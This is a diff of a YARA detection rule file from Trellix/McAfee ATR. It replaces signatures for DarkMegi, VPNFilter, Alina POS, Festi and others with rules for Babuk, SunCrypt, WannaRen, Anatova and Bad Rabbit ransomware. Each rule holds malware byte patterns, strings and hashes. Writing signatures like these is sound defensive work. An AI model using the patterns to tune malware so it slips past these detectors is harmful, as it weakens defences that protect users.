-		hash = "bf849b1e8f170142176d2a3b4f0f34b40c16d0870833569824809b5c65b99fc1"
-		logic_hash = "47faf8c5296e651f82726a6e8a7843dfa0f98e7be7257d2c03efcff550f52140"
+		hash = "48e0f7d87fe74a2b61c74f0d32e6a8a5"
+		logic_hash = "f3312b9c9147e9f892dbfb329cb95d3ee3ae67eefeec2d089b8c89fd26531953"
 		score = 75
 		quality = 70
-		tags = "DOWNLOADER, FILE"
+		tags = "RANSOM, T1027.005, T1027, T1083, T1082, T1059, T1129, FILE"
 		rule_version = "v1"
-		malware_type = "downloader"
-		malware_family = "Downloader:W32/DarkMegi"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		malware_family = "Ransom:Win/Babuk"
+		malware_type = "Ransom"
+		mitre_attack = "T1027.005, T1027, T1083, T1082, T1059, T1129"
 
 	strings:
-		$pdb = "\\RKTDOW~1\\RKTDRI~1\\RKTDRI~1\\objchk\\i386\\RktDriver.pdb"
+		$first_stage1 = { 81 ec 30 04 00 00 68 6c 49 43 00 ff 15 74 20 43 00 a3 60 4e f8 02 b8 db d9 2b 00 ba c5 62 8e 76 b9 35 11 5f 39 eb 09 8d a4 24 00 00 00 00 8b ff 89 14 24 89 4c 24 04 81 04 24 25 10 a3 3b 81 04 24 cf e0 fb 07 81 04 24 35 26 9f 42 81 04 24 65 2b 39 06 81 04 24 3c 37 33 5b 81 44 24 04 48 4f c2 5d 83 e8 01 c7 05 54 4e f8 02 00 00 00 00 75 bf 8b 0d 54 aa 43 00 53 8b 1d 58 20 43 00 55 8b 2d 60 20 43 00 56 81 c1 01 24 0a 00 57 8b 3d 50 20 43 00 89 0d 64 4e f8 02 33 f6 eb 03 8d 49 00 81 f9 fc 00 00 00 75 08 6a 00 ff 15 40 20 43 00 6a 00 ff d7 8b 0d 64 4e f8 02 81 f9 7c 0e 00 00 75 19 6a 00 ff d3 6a 00 6a 00 8d 44 24 48 50 6a 00 6a 00 ff d5 8b 0d 64 4e f8 02 81 fe e5 84 c1 09 7e 0a 81 7c 24 2c 0f 11 00 00 75 12 46 8b c6 99 83 fa 14 7c aa 7f 07 3d 30 c1 cf c7 72 a1 51 6a 00 ff 15 2c 20 43 00 8b 0d 08 a4 43 00 33 f6 a3 f4 31 f8 02 89 0d f4 07 fb 02 39 35 64 4e f8 02 76 10 8b c6 e8 56 e4 ff ff 46 3b 35 64 4e f8 02 72 f0 8b 35 80 20 43 00 bf f0 72 e9 00 8b ff 81 3d 64 4e f8 02 4d 09 00 00 75 04 6a 00 ff d6 83 ef 01 75 eb e8 d6 e3 ff ff e8 11 fe ff ff e8 0c e4 ff ff 5f 5e 5d 33 c0 5b 81 c4 30 04 00 00 c3 }
+		$first_stage2 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????eb??891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????75??8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6eb??81??????????75??6a??ff??????????6a??ffd78b??????????81??????????75??6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????7e??817c242c0f11????75??468bc69983????7c??7f??3d????????72??516a??ff??????????8b??????????33f6a3????????89??????????39??????????76??8bc6e8????????463b??????????72??8b??????????bf????????8bff81??????????????????75??6a??ffd683ef0175??e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
+		$first_stage3 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????[2-6]891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????[2-6]8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6[2-6]81??????????[2-6]6a??ff??????????6a??ffd78b??????????81??????????[2-6]6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????[2-6]817c242c0f11????[2-6]468bc69983????[2-6][2-6]3d????????[2-6]516a??ff??????????8b??????????33f6a3????????89??????????39??????????[2-6]8bc6e8????????463b??????????[2-6]8b??????????bf????????8bff81??????????????????[2-6]6a??ffd683ef01[2-6]e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
+		$first_stage4 = { 81 EC 30 04 00 00 68 6C 49 43 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? B8 DB D9 2B 00 BA C5 62 8E 76 B9 35 11 5F 39 EB ?? 8D A4 24 ?? ?? ?? ?? 8B FF 89 14 24 89 4C 24 ?? 81 04 24 25 10 A3 3B 81 04 24 CF E0 FB 07 81 04 24 35 26 9F 42 81 04 24 65 2B 39 06 81 04 24 3C 37 33 5B 81 44 24 ?? 48 4F C2 5D 83 E8 01 C7 05 ?? ?? ?? ?? 00 00 00 00 75 ?? 8B 0D ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 55 8B 2D ?? ?? ?? ?? 56 81 C1 01 24 0A 00 57 8B 3D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 33 F6 EB ?? 8D 49 ?? 81 F9 FC 00 00 00 75 ?? 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 0D ?? ?? ?? ?? 81 F9 7C 0E 00 00 75 ?? 6A 00 FF D3 6A 00 6A 00 8D 44 24 ?? 50 6A 00 6A 00 FF D5 8B 0D ?? ?? ?? ?? 81 FE E5 84 C1 09 7E ?? 81 7C 24 ?? 0F 11 00 00 75 ?? 46 8B C6 99 83 FA 14 7C ?? 7F ?? 3D 30 C1 CF C7 72 ?? 51 6A 00 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 33 F6 A3 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 39 35 ?? ?? ?? ?? 76 ?? 8B C6 E8 ?? ?? ?? ?? 46 3B 35 ?? ?? ?? ?? 72 ?? 8B 35 ?? ?? ?? ?? BF F0 72 E9 00 8B FF 81 3D ?? ?? ?? ?? 4D 09 00 00 75 ?? 6A 00 FF D6 83 EF 01 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 81 C4 30 04 00 00 C3}
+		$files_encryption1 = { 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 20 81 40 00 }
+		$files_encryption2 = {8a4602c1e90288470283ee0283ef0283????72??fdf3a5fcff????????????}
+		$files_encryption3 = { 8A 46 ?? C1 E9 02 88 47 ?? 83 EE 02 83 EF 02 83 F9 08 72 ?? FD F3 A5 FC FF 24 95 ?? ?? ?? ??}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20000KB and any of them
+		filesize <= 300KB and any of ( $first_stage* ) and any of ( $files_encryption* )
 }
-rule TRELLIX_ARC_Vpnfilter : BACKDOOR FILE
+rule TRELLIX_ARC_RANSOM_Suncrypt : RANSOMWARE FILE
 {
 	meta:
-		description = "Filter for 2nd stage malware used in VPNfilter attack"
-		author = "Christiaan Beek @ McAfee Advanced Threat Research"
-		id = "89bd7f94-d73c-5c5c-a3ec-0331f79e61fd"
-		date = "2018-05-23"
-		modified = "2020-08-14"
-		reference = "https://blog.talosintelligence.com/2018/05/VPNFilter.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_VPNfilter.yar#L1-L40"
+		description = "Rule to detect SunCrypt ransomware"
+		author = "McAfee ATR Team"
+		id = "92655f3e-f8e4-5c9f-ae3f-0796bd31d660"
+		date = "2020-10-02"
+		modified = "2020-11-02"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387"
-		logic_hash = "88f08765dff632f0c08e985181309e5c3ac9cdaa51d05d8485c411fb1a183cca"
+		logic_hash = "9f27c6c5bfe0d01ed517d55687bf699814679488f95ce4942306f09f39e29d85"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/VPNfilter"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/Suncrypt"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
+		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
 
 	strings:
-		$s1 = "id-at-postalAddress" fullword ascii
-		$s2 = "/bin/shell" fullword ascii
-		$s3 = "/DZrtenNLQNiTrM9AM+vdqBpVoNq0qjU51Bx5rU2BXcFbXvI5MT9TNUhXwIDAQAB" fullword ascii
-		$s4 = "Usage does not match the keyUsage extension" fullword ascii
-		$s5 = "id-at-postalCode" fullword ascii
-		$s6 = "vTeY4KZMaUrveEel5tWZC94RSMKgxR6cyE1nBXyTQnDOGbfpNNgBKxyKbINWoOJU" fullword ascii
-		$s7 = "id-ce-extKeyUsage" fullword ascii
-		$s8 = "/f8wYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJBgNV" fullword ascii
-		$s9 = "/etc/config/hosts" fullword ascii
-		$s10 = "%s%-18s: %d bits" fullword ascii
-		$s11 = "id-ce-keyUsage" fullword ascii
-		$s12 = "Machine is not on the network" fullword ascii
-		$s13 = "No XENIX semaphores available" fullword ascii
-		$s14 = "No CSI structure available" fullword ascii
-		$s15 = "Name not unique on network" fullword ascii
+		$pattern = { 77??2F475263????78??58436463????77??7A??5263????78??5846534D5A4678??48475263??????6B??????4D5A4679??7A??5263????78??584C5163????7A??44475264??5778??58526163????30????475264??30????58556463????31????475264??73??6B??????63????32????4752646C73??6B??????38????32??5047526477??6A??5738????68????????41555039????496C46374931????46446F62????414146442F565169????????????5039????466D4A526669??????????64??63????4F6D38????414169??????????586F69??????????33????30????69????????????6F41444141414974??38????41554542516167??2F5665??4478??434A526679??6666????64??63????4F6D444141414169??????????33??69????????????77??33????2F33????2F33????36??49464141434478??7A??64667A??64??7A??64??6A??73??7A??2F34??454449584164??517A??4F74??69??????????5834??5558672F33????2F33????36??6E362F2F39????59584164??517A??4F73??69??????????33??69????????????554B30????69????????????30????5838????5830????5549554974??4446434C525268????????30??39????77??444A77??574C37495073??4D5A4634??62????65??70??6B??????73??4634??54475265??31????586C5963????35????????65????78??586F63????4636??2F47526570??78??5872??63????37475047526531??78??5875??4931????46446F534163????46442F565169????????????66??51616B??????52434C51416A??63????4C5252442F63????2F566679??78??434677??55454D38??????475368????????41496C462B????462B????4E454974??49496C49434974??454974??434974??454974??49414E494B496C4E39????4639????517A??5041514D6E44565976??555974??434974??434974??434974??494474??4E4855464D38????367A??4C525169??????????????6C72??51574466??68????????454D38??????6F74??434974??434974??434974??494374??4E496C4E2F5039??2F4974??435039????4F6A??2B????2F57566E4A77??574C37494873??41414141494E6C6C4143445A6141416733??514148554969??????????30??????44475266??75??6B??????4D5A4638????475266??73??6B??????4D5A4639????475266??6B??????33????5A462B????4752666B??????5867??73??4634??6E475265??79??6B??????4D5A4635????????65??68????????62????4635????????65??????????70??63????366E4C47526574??78??5873??4D5A4630????475264??70??6B??????73??4630??54475264??31????58565963????31????475264????78??585962????4632????47526470??78??5862????5A4633????475262????78??5739????5A4676??54475262??4478??58416463????77??4C475263????78??58445A63????78??37475263????78??5847554D5A4678??4C475263????78??584A5938????79??58475263??????6B??????38????7A??44475261526178??576C64??????70??584752616475??6B??????63????71??4847526170??78??5772??73??4672??6E47526131??????5775??38????72??2F475262????78??5778??38????73??58475262????78??5730??????4674??6E475262????78??5733????5A4675??434E5265??5136??4D46414142512F31????69????????????51554F677A??514141555039????496C466E4931????46446F4977??414146442F565169????????????6152516A??5877??5039????46442F565169????????????52434C514269????????????4932????502F2F2F31??????667A??565A434677??515A67??32????414142414855433677??4C526677??68????????2F2B????667A??31????46454974??434974??454974??4E4474??47484A4D69??????????414969??????????5838????36??6661414164??69??????????????6A??565978??2F31????68????????32????61414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C4249476F4561414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C42494974??45494E34??414231????74??454974??43476F49575776??42594E38????77??64??474C5252434C514169??????????????534A51534472??476F4561414177??41434C5252434C514169??????????????6F412F31????67??????69??????????456769??????????67????48554636??67??4141434C5252434C51416A??63????4C5252442F63????4C5252442F63????6F30????4141495045444974??454974??434974??454974??43412B??5352534E524167??69????????????38????73??69??????????6C462F4974??454974??43412B??51415935????????4F5774??2F4369??????????????45516130????4B4974??454974??454974??6D414E4D4168????????5838????74??454974??494974??6D414E4D416778??36??59424141434478??7A??73??64??6C4145414141417A??412B????50372F2F34??466C4D6E44565976??555974??434974??434974??45496C49424974??434974??42412B??414431????67??4164??517A??4F73??69??????????414569??????????6B??????67??????554969????????????4969??????????68????????4164??517A?? }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 500KB and ( 8 of them ) ) or ( all of them )
+		uint16( 0 ) == 0x6441 and all of them
 }
-rule TRELLIX_ARC_Chikdos_Malware_Pdb : DOS FILE
+rule TRELLIX_ARC_RANSOM_Suncrypt_Decryptor : RANSOMWARE FILE
 {
 	meta:
-		description = "Chikdos PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "0174ff2b-57fc-5578-b45e-c08bf8528ee8"
-		date = "2013-12-02"
-		modified = "2020-08-14"
-		reference = "http://hackermedicine.com/tag/trojan-chickdos/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_chickdos_pdb.yar#L1-L25"
+		description = "Rule to detect SunCrypt ransomware decryptor"
+		author = "McAfee ATR Team"
+		id = "ec0d3811-6083-5537-bf29-32ee02d43b5e"
+		date = "2020-10-02"
+		modified = "2020-11-02"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L27-L50"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c2a0e9f8e880ac22098d550a74940b1d81bc9fda06cebcf67f74782e55e9d9cc"
-		logic_hash = "150bf809a61aad00df0c49fb6a609b909c84ffb9ca442e143a6c5bf3dfc39314"
+		logic_hash = "59d1193bb0f8d3983a181394b5dd5247470d9e118cc4fe0674167f162bcdb6e1"
 		score = 75
 		quality = 70
-		tags = "DOS, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "dos"
-		malware_family = "Dos:W32/ChickDos"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/Suncrypt"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "a0f99367b0a0a358ed6e5ae25904016d02aef6aa7c0423c34aa3ec3fd6354310"
 
 	strings:
-		$pdb = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb"
+		$pattern = { 558BEC81EC88000000837D08008BC10F101A89957CFFFFFF0F104A10898578FFFFFF0F1062200F106A300F115D940F114DA40F1165B40F116DC40F8E340200008B45D08B4DC48B55B08945F88B45CC8945E08B45C88945E88B45C08945F08B45BC8945F48B45B8538B5DA88945EC8B45AC568B75A48945D48B45A0578975DC8945E48B459403C68BF033F18B4DB4C1C61003CE8BF9337DDCC1C70C03C78945DC33C6C1C0088945D803C18B4DEC89458833C7C1C0078945848B459803C38BF03375E8C1C61003CE8BF933FBC1C70C03C78945E833C6C1C00889458C03C18B4DF48BD88945EC33DF8B459C0345D48B7DE48BF03375E003FAC1C61003CEC1C307894DF4334DD4C1C10C03C133F08945908B45F0C1C6088975800375F433CEC1C107894DE08B4DF833CFC1C11003C133D08945F0C1C20C8D043A8B7DF033C88945E48B45DCC1C10803F9894DF833D7C1C20703C38BC8334DF8C1C11003F18975FC315DFC8B5DFCC1C30C03C389459433C1C1C0088945F88945D003C633D88945F48945BC8B45E80345E08BC8C1C307334DD8C1C110895DFC895DA88B5DEC8D340F8BFE337DE0C1C70C03C789459833C1C1C0088945D88945C403C68B758833F88945F08945C08B459003C2C1C7078BC8897DD4334D8CC1C11003F1897DAC8B7DE433D6037D84C1C20C03C289459C33C1C1C0088945E88945C803C633D08945B48BC7C1C207334580C1C01003D88BCB334D84C1C10C03F98BF7897DE433F0897DA0C1C60803DE8975E08975CC895DEC8B45088BF333F1895DB88B5DFC488B4DD8C1C6078975DC8975A489450885C00F8F30FEFFFF0F106DC48B8578FFFFFF0F1065B45F0F105D948955B00F104DA48B957CFFFFFF5E5B0F10020F105210660FFED80F104230660FFED10F104A200F1118660FFECC660FFEC50F1150100F1148200F1140308BE55DC3CCCCCCCCCCCCCCCCCCCC558BEC83E4F081EC58020000568BC18B4D1489442420578BFA897C24283D000100000F82680A0000660F6E07660F70C800660F6E4704660F70D000660F6E4708660F70D800660F6E470C660F70E000660F6E4710660F70E800660F6E47148B7508660F70F000660F6E47188B550C660F70F8008D8EC0000000660F6E471C660F70C0000F29842430010000660F6E4720660F70C0000F29842440010000660F6E4724660F70C0000F29842450010000660F6E4728660F70C0000F29842460010000660F6E472C894C240C8D8AC0000000660F70C000894C241C8D8E800000000F29842470010000660F6E4738894C24148D8A80000000660F70C000894C24188D4E400F29842480010000660F6E473C894C242C8D4A40660F70C000C1E8080F298C24A00100000F299424B00100000F299C24C00100000F29A424D00100000F29AC24E00100000F29B424F00100000F29BC24000200000F29842490010000894C24108944242066660F1F8400000000000F2884243001000033C00B47308B4F340F298424800000000F288424400100000F298424900000000F288424500100000F294424600F288424600100000F298424100100000F28842470010000894C244C8944244883C0040F298C24D0000000F30F7E4C244883D1000F298424200100000F288424900100000F299424E00000000F2815A02B4200660F6CC90F29442430660FD4D10F2805B02B42000F29A424A0000000660FD4C10F28E20F29B42400010000660F62E0660F6AD00F28F40F299C24F00000000F28DD0F28AC2480010000660F62F20F297C24700F28FE660F6AE2894F348B4D140F295C24500F29AC24C00000000F29A424B00000000F29BC24400200000F29A4245002000089473085C90F84820400000F287C24708BC166900F28D3660FFE9424D0000000660FEFF2660F380035C02B42000F28DE660FFE9C24900000000F28C3660FEF4424500F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942400010000660FFE9424E0000000660FEFF0660F380035D02B42000F29842490000000660FEFE2660F380025C02B42000F28C60F29742470660FFEC30F28DC660FFE5C24600F29842410020000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424000100000F298C24200200000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D7660FFE9424F0000000660FEFE0660F380025D02B42000F29442460660FEFEA660F38002DC02B42000F28C40F29A424B0000000660FFEC30F28DD660FFE9C24100100000F29842430020000660FEFC10F28F0660F72F007660F72D619660FEBF00F28C3660FEFC70F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FFE9424A0000000660FEFE8660F38002DD02B42000F294424500F28E50F29AC24C0000000660FFEE30F28C4660FEFC10F28F8660F72F007660F72D719660FEBF80F286C2430660FEFEA660F38002DC02B42000F28DD660FFE9C24200100000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D6660FEFE8660FFE942490000000660F38002DD02B42000F298424A00000000F296C2430660FFEEB0F28C5660FEFC10F28C8660F72F007660F72D119660FEBC80F28442430660FEFC20F298C2480000000660F380005C02B42000F28D80F29442430660FFEDC0F28C3660FEFC60F287424700F28C8660F72F00C660F72D114660FEBC80F284424300F28E1660FFEE20F28D7660FFE542460660FEFC4660F380005D02B4200660FEFF20F29A424D0000000660F380035C02B42000F29442430660FFEC30F298424100100000F28DE660FEFC1660FFEDD0F28C8660F72F007660F72D119660FEBC80F28C3660FEFC70F298C24000100000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FEFF00F298424E0000000660F380035D02B42000F28C6660FFEC30F29842420010000660FEFC10F28F8660F72F007660F72D719660FEBF8660FFE5424500F28A424B00000000F28AC24C0000000660FEFE2660F380025C02B42000F28DC660FFE9C24100200000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942420020000660FFE9424A0000000660FEFE00F298424F0000000660FEFEA660F380025D02B4200660F38002DC02B42000F29A424B00000000F28C4660FFEC30F28DD660FFE9C24300200000F29842490000000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424200200000F298C24800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F298424A0000000660FEFE8660F38002DD02B42000F29AC24C00000000F28C5660FFEC30F29442460660FEFC10F28D8660F72F007660F72D319660FEBD80F295C245083E8010F8594FBFFFF0F297C24700F28BC24400200000F28AC24A0010000660FFEAC24D00000000F28A424C00100000F28DD660FFEA424F00000000F288C24B00100000F28D4660FFE8C24E00000000F288424D0010000660FFE8424A00000008B44242C8B7C2414660F62D9660F6AE90F28CB660F6AE0660F62D00F10068344241410660F6CCA660FEFC8660F6DDA0F110A0F10008B4424100F28CD660F6DEC660FEFD8660F6CCC0F28A424000200000F111883C0100F10078B7C2418660FFE642470660FEFC883442418100F28D4894424100F110F8B7C240C0F288C24F0010000660FFE8C24000100008344240C100F10078B7C241C8344241C10660FEFE80F28842430010000660FFE8424800000000F112F8B7C242C0F28AC24E0010000660FFE6C24500F28DD660F62D0660F62D9660F6AE90F28CB660F6AE00F104610660F6CCA660FEFC8660F6DDA0F114A100F1047100F28CD660F6DEC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFE80F11280F28AC2440010000660FFEFE660FFEAC24900000000F28A424600100000F28DD660FFEA424100100000F288C24500100000F28D4660FFE4C24600F28842470010000660FFE84242001000083442410108B4424108344241410660F62D98344241810660F6AE90F28CB660F6AE0660F62D00F1046208344240C10660F6CCA660FEFC88344241C100F114A200F104720660F6DDA0F28CD660FEFD8660F6CCC0F11188B44241483442414100F28DF660F6DEC0F28A424800100000F10008B442418660FFEA424C0000000660FEFC883442418100F28D40F11088B44240C0F288C2450020000660FFE8C24B00000008344240C100F10008B44241C660F62D9660FEFE8660F6AF90F288424900100000F28CB660FFE4424300F11288B442410660F62D083C010660F6AE00F1046308344241C10660F6CCA660FEFC8660F6DDA0F114A30894424100F1047300F28CF660F6DFC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFF881442410D000000081C70001000081442418D000000081C2000100008144241CD000000081C60001000081442414D00000008144240CD00000000F288C24A00100000F289424B00100000F289C24C00100000F28A424D00100000F28AC24E00100000F28B424F00100000F11388B4424240F28BC24000200002D00010000836C242001897C242C8B7C2428894424240F85E2F6FFFFEB068B550C8B75088954241083F8400F829A010000C1E80689442420660F1F4400000F10370F1057100F107F200F106F3085C90F84F60000008BC10F1F80000000000F28DA660FFEDE660FEFEB660F38002DC02B42000F28E5660FFEE70F28C4660FEFC20F28C8660F72F00C660F72D114660FEFC80F28D1660FFED3660FEFEA660F70D293660F38002DD02B42000F28DD660F70ED4E660FFEDC660F70E3390F28C3660FEFC10F28C8660F72F007660F72D119660FEFC8660FFED1660FEFEA660F38002DC02B4200660FFEE50F28C4660FEFC10F28D8660F72F00C660F72D314660FEFD80F28C3660FFEC2660F70F039660FEFE8660F38002DD02B42000F28C5660F70ED4E660FFEC4660F70F8930F28C8660FEFCB0F28D1 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule TRELLIX_ARC_Alina_POS_PDB : POS FILE
+rule TRELLIX_ARC_Wannaren_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Alina POS"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "9588aa10-d5e4-55f4-998c-a01503a53d3a"
-		date = "2013-08-08"
-		modified = "2020-08-14"
-		reference = "https://www.pandasecurity.com/mediacenter/pandalabs/alina-pos-malware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_alina_pos_pdb.yar#L1-L25"
+		description = "Rule to detect WannaRen Ransomware"
+		author = "McAfee ATR Team"
+		id = "f4f30d12-547d-5044-a4e5-b88bf359480f"
+		date = "2020-04-25"
+		modified = "2020-10-12"
+		reference = "https://blog.360totalsecurity.com/en/attention-you-may-have-become-a-susceptible-group-of-wannaren-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wannaren.yar#L1-L34"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "28b0c52c0630c15adcc857d0957b3b8002a4aeda3c7ec40049014ce33c7f67c3"
-		logic_hash = "9bb8260e3a47567e2460dd474fb74e57987e3d79eb30cdbc2a45b88a16ba1ca2"
+		hash = "7b364f1c854e6891c8d09766bcc9a49420e0b5b4084d74aa331ae94e2cfb7e1d"
+		logic_hash = "0feb913b84eb0ecdda688f0cf0a5051798fe4fbce8a6ea959825985a81a6699c"
 		score = 75
 		quality = 70
-		tags = "POS, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "pos"
-		malware_family = "Pos:W32/Alina"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/WannaRen"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Users\\dice\\Desktop\\SRC_adobe\\src\\grab\\Release\\Alina.pdb"
+		$sq0 = { 92 93 a91c2ea521 59 334826 }
+		$sq1 = { d0ce 6641 c1e9c0 41 80f652 49 c1f94d }
+		$sq2 = { 80f8b5 4d 63c9 f9 4d 03d9 41 }
+		$sq3 = { 34b7 d2ea 660fbafa56 0f99c2 32d8 660fbafaed 99 }
+		$sq4 = { f9 f7c70012355f 35c01f5226 f9 8d8056c800b0 f6c4b2 f9 }
+		$sq5 = { f5 f9 44 3aeb 45 33cd 41 }
+		$sq6 = { 890f c0ff12 44 b4a3 ee 2b4e70 7361 }
+		$sq7 = { 81c502000000 6689542500 6681d97a1e 660fabe1 660fbae1a5 8b0f 8dbf04000000 }
+		$sq8 = { 8d13 de11 d7 677846 f1 0d8cd45f87 bb34b98f33 }
+		$sq9 = { 1440 4b 41 e8???????? 397c0847 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 21000KB and 7 of them
 }
-rule TRELLIX_ARC_Festi_Botnet_Pdb : BOTNET FILE
+rule TRELLIX_ARC_Anatova_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Festi botnet based on PDB"
+		description = "Rule to detect the Anatova Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "02f4149d-b8ac-5852-8cbe-c47f4cddcba6"
-		date = "2013-03-04"
+		id = "6e3205aa-42e4-5449-877e-37494cdd096b"
+		date = "2019-01-22"
 		modified = "2020-08-14"
-		reference = "https://www.welivesecurity.com/2012/05/11/king-of-spam-festi-botnet-analysis/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_festi_botnet_pdb.yar#L1-L25"
+		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Anatova.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e55913523f5ae67593681ecb28d0fa1accee6739fdc3d52860615e1bc70dcb99"
-		logic_hash = "46e2576900fe94d614a683d4f09079b7ac78654079b2e558d076bcb42db4bf11"
+		hash = "97fb79ca6fc5d24384bf5ae3d01bf5e77f1d2c0716968681e79c097a7d95fb93"
+		logic_hash = "4fce15ad0ef2d3cb39f6092677f117308f847815cb2a5a491290a1f9d09776df"
 		score = 75
-		quality = 70
-		tags = "BOTNET, FILE"
+		quality = 45
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Festi"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Anatova"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\eclipse\\botnet\\drivers\\Bin\\i386\\kernel.pdb"
+		$regex = /anatova[0-9]@tutanota.com/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $regex
 }
-rule TRELLIX_ARC_MALW_Emotet : FINANCIAL FILE
+
+rule TRELLIX_ARC_Badbunny : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect unpacked Emotet"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "5bc83065-dfdd-56b7-9983-200bff35c8b1"
-		date = "2020-07-21"
+		description = "Bad Rabbit Ransomware"
+		author = "Christiaan Beek"
+		id = "190ee396-4c26-54f7-baac-bb45e3587488"
+		date = "2017-10-24"
 		modified = "2020-08-14"
